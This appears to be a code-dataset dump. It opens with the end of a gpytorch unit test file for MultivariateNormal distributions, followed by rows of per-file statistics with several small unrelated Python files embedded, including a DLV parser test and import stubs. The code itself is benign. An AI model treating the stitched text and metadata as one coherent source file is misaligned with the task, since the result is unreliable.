        self.assertTrue(mvn.sample(torch.Size([2, 4])).shape == torch.Size([2, 4, 2, 3]))

    def test_multivariate_normal_batch_non_lazy_cuda(self):
        if torch.cuda.is_available():
            self.test_multivariate_normal_batch_non_lazy(cuda=True)

    def test_multivariate_normal_lazy(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
        covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
        mvn = MultivariateNormal(mean=mean, covariance_matrix=NonLazyTensor(covmat))
        self.assertTrue(torch.is_tensor(mvn.covariance_matrix))
        self.assertIsInstance(mvn.lazy_covariance_matrix, LazyTensor)
        self.assertTrue(torch.equal(mvn.variance, torch.diag(covmat)))
        self.assertTrue(torch.equal(mvn.covariance_matrix, covmat))
        mvn_plus1 = mvn + 1
        self.assertTrue(torch.equal(mvn_plus1.mean, mvn.mean + 1))
        self.assertTrue(torch.equal(mvn_plus1.covariance_matrix, mvn.covariance_matrix))
        mvn_times2 = mvn * 2
        self.assertTrue(torch.equal(mvn_times2.mean, mvn.mean * 2))
        self.assertTrue(torch.equal(mvn_times2.covariance_matrix, mvn.covariance_matrix * 4))
        mvn_divby2 = mvn / 2
        self.assertTrue(torch.equal(mvn_divby2.mean, mvn.mean / 2))
        self.assertTrue(torch.equal(mvn_divby2.covariance_matrix, mvn.covariance_matrix / 4))
        # TODO: Add tests for entropy, log_prob, etc. - this is an issue because
        # it uses root_decomposition, which is not very reliable
        # self.assertAlmostEqual(mvn.entropy().item(), 4.3157, places=4)
        # self.assertAlmostEqual(mvn.log_prob(torch.zeros(3)).item(), -4.8157, places=4)
        # self.assertTrue(
        #     approx_equal(mvn.log_prob(torch.zeros(2, 3)), -4.8157 * torch.ones(2))
        # )
        conf_lower, conf_upper = mvn.confidence_region()
        self.assertTrue(approx_equal(conf_lower, mvn.mean - 2 * mvn.stddev))
        self.assertTrue(approx_equal(conf_upper, mvn.mean + 2 * mvn.stddev))
        self.assertTrue(mvn.sample().shape == torch.Size([3]))
        self.assertTrue(mvn.sample(torch.Size([2])).shape == torch.Size([2, 3]))
        self.assertTrue(mvn.sample(torch.Size([2, 4])).shape == torch.Size([2, 4, 3]))

    def test_multivariate_normal_lazy_cuda(self):
        if torch.cuda.is_available():
            self.test_multivariate_normal_lazy(cuda=True)

    def test_multivariate_normal_batch_lazy(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
        covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
        mvn = MultivariateNormal(mean=mean.repeat(2, 1), covariance_matrix=NonLazyTensor(covmat).repeat(2, 1, 1))
        self.assertTrue(torch.is_tensor(mvn.covariance_matrix))
        self.assertIsInstance(mvn.lazy_covariance_matrix, LazyTensor)
        self.assertTrue(approx_equal(mvn.variance, covmat.diag().repeat(2, 1)))
        mvn_plus1 = mvn + 1
        self.assertTrue(torch.equal(mvn_plus1.mean, mvn.mean + 1))
        self.assertTrue(torch.equal(mvn_plus1.covariance_matrix, mvn.covariance_matrix))
        mvn_times2 = mvn * 2
        self.assertTrue(torch.equal(mvn_times2.mean, mvn.mean * 2))
        self.assertTrue(torch.equal(mvn_times2.covariance_matrix, mvn.covariance_matrix * 4))
        mvn_divby2 = mvn / 2
        self.assertTrue(torch.equal(mvn_divby2.mean, mvn.mean / 2))
        self.assertTrue(torch.equal(mvn_divby2.covariance_matrix, mvn.covariance_matrix / 4))
        # TODO: Add tests for entropy, log_prob, etc. - this is an issue because
        # it uses root_decomposition, which is not very reliable
        # self.assertTrue(approx_equal(mvn.entropy(), 4.3157 * torch.ones(2)))
        # self.assertTrue(
        #     approx_equal(mvn.log_prob(torch.zeros(2, 3)), -4.8157 * torch.ones(2))
        # )
        # self.assertTrue(
        #     approx_equal(mvn.log_prob(torch.zeros(2, 2, 3)), -4.8157 * torch.ones(2, 2))
        # )
        conf_lower, conf_upper = mvn.confidence_region()
        self.assertTrue(approx_equal(conf_lower, mvn.mean - 2 * mvn.stddev))
        self.assertTrue(approx_equal(conf_upper, mvn.mean + 2 * mvn.stddev))
        self.assertTrue(mvn.sample().shape == torch.Size([2, 3]))
        self.assertTrue(mvn.sample(torch.Size([2])).shape == torch.Size([2, 2, 3]))
        self.assertTrue(mvn.sample(torch.Size([2, 4])).shape == torch.Size([2, 4, 2, 3]))

    def test_multivariate_normal_batch_lazy_cuda(self):
        if torch.cuda.is_available():
            self.test_multivariate_normal_batch_lazy(cuda=True)

    def test_multivariate_normal_correlated_samples(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
        covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
        mvn = MultivariateNormal(mean=mean, covariance_matrix=NonLazyTensor(covmat))
        base_samples = mvn.get_base_samples(torch.Size((3, 4)))
        self.assertTrue(mvn.sample(base_samples=base_samples).shape == torch.Size([3, 4, 3]))
        base_samples = mvn.get_base_samples()
        self.assertTrue(mvn.sample(base_samples=base_samples).shape == torch.Size([3]))

    def test_multivariate_normal_correlated_samples_cuda(self):
        if torch.cuda.is_available():
            self.test_multivariate_normal_correlated_samples(cuda=True)

    def test_multivariate_normal_batch_correlated_samples(self, cuda=False):
        device = torch.device("cuda") if cuda else torch.device("cpu")
        mean = torch.tensor([0, 1, 2], dtype=torch.float, device=device)
        covmat = torch.diag(torch.tensor([1, 0.75, 1.5], device=device))
        mvn = MultivariateNormal(mean=mean.repeat(2, 1), covariance_matrix=NonLazyTensor(covmat).repeat(2, 1, 1))
        base_samples = mvn.get_base_samples(torch.Size((3, 4)))
        self.assertTrue(mvn.sample(base_samples=base_samples).shape == torch.Size([3, 4, 2, 3]))
        base_samples = mvn.get_base_samples()
        self.assertTrue(mvn.sample(base_samples=base_samples).shape == torch.Size([2, 3]))

    def test_multivariate_normal_batch_correlated_samples_cuda(self):
        if torch.cuda.is_available():
            self.test_multivariate_normal_batch_correlated_samples(cuda=True)


if __name__ == "__main__":
    unittest.main()
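# To run this suite directly from a gpytorch checkout (plain unittest,
# nothing project-specific assumed):
#   python test/distributions/test_multivariate_normal.py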
| 58.286458
| 118
| 0.683764
| 1,526
| 11,191
| 4.837484
| 0.074705
| 0.127066
| 0.077215
| 0.08453
| 0.947575
| 0.93728
| 0.928068
| 0.899621
| 0.869277
| 0.869277
| 0
| 0.032951
| 0.181038
| 11,191
| 191
| 119
| 58.591623
| 0.772504
| 0.068001
| 0
| 0.703947
| 0
| 0
| 0.004803
| 0
| 0
| 0
| 0
| 0.005236
| 0.453947
| 1
| 0.078947
| false
| 0
| 0.039474
| 0
| 0.125
| 0.006579
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
438449ad4ee647fb59f0da92db683246e22a4891
| 141
|
py
|
Python
|
tests/parser/recursive_aggregates.2.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/recursive_aggregates.2.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/recursive_aggregates.2.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
d(1).
d(2).
d(3).
d(4) :- #min{V : d(V)} = 1.
"""
output = """
d(1).
d(2).
d(3).
d(4) :- #min{V : d(V)} = 1.
"""
| 8.294118
| 28
| 0.29078
| 28
| 141
| 1.464286
| 0.321429
| 0.097561
| 0.146341
| 0.195122
| 0.731707
| 0.731707
| 0.731707
| 0.731707
| 0.731707
| 0.731707
| 0
| 0.103093
| 0.312057
| 141
| 16
| 29
| 8.8125
| 0.319588
| 0
| 0
| 0.833333
| 0
| 0
| 0.75969
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
43b44a662a6f0c396e5b0b93df345e62dae7378a
| 282
|
py
|
Python
|
impl/inversion/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
impl/inversion/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
impl/inversion/__init__.py
|
cmrudolph/algorithms
|
3097d0082094ade4de654b342db09be22e2917ba
|
[
"MIT"
] | null | null | null |
from .inversion import (py_brute_force,
                        py_recursive_merge,
                        adapt_benchmark_args,
                        adapt_run_args)

__all__ = [
    'py_brute_force',
    'py_recursive_merge',
    'adapt_benchmark_args',
    'adapt_run_args'
]
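# Hypothetical usage, assuming the repository root is on sys.path:
#   from impl.inversion import py_brute_force, py_recursive_merge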
| 23.5
| 45
| 0.560284
| 28
| 282
| 4.928571
| 0.464286
| 0.101449
| 0.173913
| 0.202899
| 0.84058
| 0.84058
| 0.84058
| 0.84058
| 0.84058
| 0.84058
| 0
| 0
| 0.368794
| 282
| 11
| 46
| 25.636364
| 0.775281
| 0
| 0
| 0
| 0
| 0
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43d010b3ca481bea9b8bf65c8a090f69433dda3a
| 170
|
py
|
Python
|
loldib/getratings/models/NA/na_cassiopeia/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_cassiopeia/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_cassiopeia/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_cassiopeia_top import *
from .na_cassiopeia_jng import *
from .na_cassiopeia_mid import *
from .na_cassiopeia_bot import *
from .na_cassiopeia_sup import *
| 28.333333
| 33
| 0.794118
| 25
| 170
| 5
| 0.36
| 0.24
| 0.64
| 0.704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 170
| 5
| 34
| 34
| 0.862069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
60112a997239409730680e34f2be721cd2aaa7bf
| 111
|
py
|
Python
|
src/vpnchooser/helpers/fields/__init__.py
|
cbrand/vpnchooser
|
0982baeb14eff1e0b7ef5dbc8f11b3a7213f341c
|
[
"MIT"
] | null | null | null |
src/vpnchooser/helpers/fields/__init__.py
|
cbrand/vpnchooser
|
0982baeb14eff1e0b7ef5dbc8f11b3a7213f341c
|
[
"MIT"
] | null | null | null |
src/vpnchooser/helpers/fields/__init__.py
|
cbrand/vpnchooser
|
0982baeb14eff1e0b7ef5dbc8f11b3a7213f341c
|
[
"MIT"
] | 1
|
2016-05-31T16:14:37.000Z
|
2016-05-31T16:14:37.000Z
|
# -*- encoding: utf-8 -*-
from .absolute_url import AbsoluteUrl
from .absolute_url import NullableAbsoluteUrl
| 22.2
| 45
| 0.774775
| 13
| 111
| 6.461538
| 0.692308
| 0.285714
| 0.357143
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.126126
| 111
| 4
| 46
| 27.75
| 0.85567
| 0.207207
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|